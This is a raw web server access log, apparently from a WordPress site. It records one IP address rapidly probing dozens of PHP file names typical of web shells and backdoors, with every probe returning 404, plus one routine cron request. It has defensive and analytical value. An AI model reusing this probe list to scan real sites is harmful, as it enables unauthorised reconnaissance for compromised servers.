4.217.161.165 - - [04/Sep/2025:18:03:46 +0800] "GET /krypton.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:46 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:46 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:46 +0800] "GET /CLA.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:47 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:47 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:47 +0800] "GET /php.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:47 +0800] "GET /goat.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:47 +0800] "GET /ez.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:47 +0800] "GET /temp.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:47 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:47 +0800] "GET /we.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:48 +0800] "GET /pp.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:48 +0800] "GET /co.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:48 +0800] "GET /system_log.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:48 +0800] "GET /in.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:48 +0800] "GET /inputs.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:48 +0800] "GET /new.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:48 +0800] "GET /num.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:48 +0800] "GET /lv.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:48 +0800] "GET /helper.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:49 +0800] "GET /file32.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:49 +0800] "GET /config.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:49 +0800] "GET /bless_250808022320.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:49 +0800] "GET /3.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:49 +0800] "GET /axx.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:49 +0800] "GET /zadad4dadad1.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:49 +0800] "GET /xLB2NXAP.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:49 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:50 +0800] "GET /wsback.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:50 +0800] "GET /cfile.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:50 +0800] "GET /re.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [04/Sep/2025:18:03:51 +0800] "POST /wp-cron.php?doing_wp_cron=1756980231.0767269134521484375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
4.217.161.165 - - [04/Sep/2025:18:03:51 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:51 +0800] "GET /vxrl.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:51 +0800] "GET /Sanskrit.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:51 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:51 +0800] "GET /cbgd.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:51 +0800] "GET /aucxzso.php HTTP/1.1" 404 27 "-" "-"
